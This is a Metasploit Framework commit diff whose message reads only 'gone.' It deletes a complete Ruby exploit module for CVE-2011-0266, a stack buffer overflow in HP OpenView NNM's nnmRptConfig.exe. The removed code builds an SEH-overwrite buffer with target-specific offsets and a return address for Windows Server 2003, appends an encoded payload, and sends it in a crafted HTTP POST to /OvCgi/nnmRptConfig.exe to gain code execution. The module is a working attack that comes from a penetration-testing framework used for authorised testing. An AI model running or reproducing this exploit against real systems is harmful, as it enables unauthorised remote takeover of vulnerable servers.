gone.

git-svn-id: file:///home/svn/framework3/trunk@12088 4d416f70-5f16-0410-b530-b9f4589650da
2011-03-23 03:45:01 +00:00 · 2011-03-23 03:45:01 +00:00 · 422e5ae7b1
parent ddb7fa5470
commit 422e5ae7b1
1 changed files with 0 additions and 106 deletions
--- a/modules/exploits/windows/http/hp_nnm_nnmRptConfig_nameParams.rb
+++ b/modules/exploits/windows/http/hp_nnm_nnmRptConfig_nameParams.rb
@ -1,106 +0,0 @@
-##
-# $Id$
-##
-
-##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# Framework web site for more information on licensing and terms of use.
-# http://metasploit.com/framework/
-##
-
-require 'msf/core'
-
-class Metasploit3 < Msf::Exploit::Remote
-	Rank = NormalRanking
-
-	include Msf::Exploit::Remote::HttpClient
-	include Msf::Exploit::Remote::Seh
-
-	def initialize(info={})
-		super(update_info(info,
-			'Name'        => "HP OpenView NNM nnmRptConfig nameParams Buffer Overflow",
-			'Description' => %q{
-				This module exploits a vulnerability in HP NNM's nnmRptConfig.exe.
-				A remote user can send a long string data to the nameParams parameter via
-				a POST request, which causes an overflow on the stack when function
-				ov.sprintf_new() is used, and gain arbitrary code execution.'
-			},
-			'License'	  => MSF_LICENSE,
-			'Version'	  => "$Revision$",
-			'Author'      =>
-				[
-					'sinn3r',
-				],
-			'References' =>
-				[
-					['CVE', '2011-0266'],
-					['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-008/']
-				],
-			'Payload'	 =>
-				{
-					'BadChars' => "\x00\x26\x2b",
-				},
-			'DefaultOptions' =>
-				{
-					'ExitFunction' => "seh",
-					'AutoRunScript' => 'migrate -f',
-				},
-			'Platform' => 'win',
-			'Targets'  =>
-				[
-					['Windows Server 2003 Enterprise', {'Ret'=>0x5A30532D, 'offset'=>46913, 'Pops'=>13, 'Payloadoffset'=>57} ],
-				],
-			'Privileged'     => false,
-			'DisclosureDate' => "JAN 10 2011"))
-
-			register_options(
-				[
-					Opt::RPORT(80),
-				], self.class)
-	end
-
-	def exploit
-
-		nops = make_nops(1000)*70
-
-		sploit  = nops[0, target['offset']]
-		sploit << generate_seh_record(target.ret)
-		sploit << "\x61"*target['Pops']
-		sploit << "\x51"
-		sploit << "\xc3"
-		sploit << nops[0, target['Payloadoffset']]
-		sploit << payload.encoded
-		sploit << nops[0, 70000-sploit.length]
-
-		data  = "Content&Action=Create&"
-		data << "Template=Avail/CRAvail&"
-		data << "Operation=Apply&"
-		data << "Params=schdParams+nameParams"
-		data << "&schdParams=schd_select1%3Ddaily%7Cmonthtodate&"
-		data << "nameParams=text1%3D#{sploit}%26text2%3Dtest2test%26text3%3Dtest2 HTTP/1.1"
-
-		connect
-		send_request_raw({
-			'uri' => '/OvCgi/nnmRptConfig.exe',
-			'data' => data,
-			'version' => '1.1',
-			'method' => 'POST',
-			'headers' => {
-				'Accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
-				'Accept-Language' => 'en-us,en;q=0.5',
-				'Accept-Encoding' => 'gzip,deflate',
-				'Accept-Charset' => 'ISO-8859-1,utf-8;q=0.7,*;q=0.7',
-				'Keep-Alive' => '300',
-				'Connection' => 'Keep-Alive',
-				'Cache-Control' => 'max-age=0',
-				'Content-Length' => data.length,
-				'Content-Type' => 'application/x-www-form-urlencoded',
-			}
-		}, 3)
-
-		handler
-		disconnect
-
-	end
-end